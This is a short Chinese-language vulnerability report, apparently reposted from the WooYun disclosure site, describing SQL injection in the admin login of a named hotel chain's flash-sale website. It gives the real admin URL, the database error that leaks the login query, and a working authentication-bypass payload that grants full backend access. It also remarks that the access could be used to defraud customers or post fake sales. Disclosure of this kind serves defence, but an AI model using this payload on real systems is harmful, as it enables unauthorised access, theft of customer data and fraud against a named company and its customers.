简要描述:
汉庭连锁酒店后台SQL注入,可绕过登陆限制进入后台,可脱库.
详细说明:
问题发生在这个站点.http://miaosha.htinns.com/
标题内没有写具体信息.因为怕发布后被人入侵.
后台登陆地址为:http://miaosha.htinns.com/admin/admin_login.php
帐号输入admin'
登陆后提示如下图
爆出了查询语句.
Database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '453e41d218e071ccfb2d1c99ce23906a'' at line 1]
select * from users_admin where userid='admin'' and pwd='453e41d218e071ccfb2d1c99ce23906a'
重点在这里
select * from users_admin where userid='admin'' and pwd='453e41d218e071ccfb2d1c99ce23906a'
然后构造绕过
使用帐号admin' or '1'='1 /*
成功绕过登陆后台,截图如下
拥有后台全部权限...可以获得所有秒杀成功的数据,对其进行诈骗.
也可以发布秒杀信息,造成汉庭信任公关危机...
摘自:http://www.wooyun.org/bugs/wooyun-2010-05156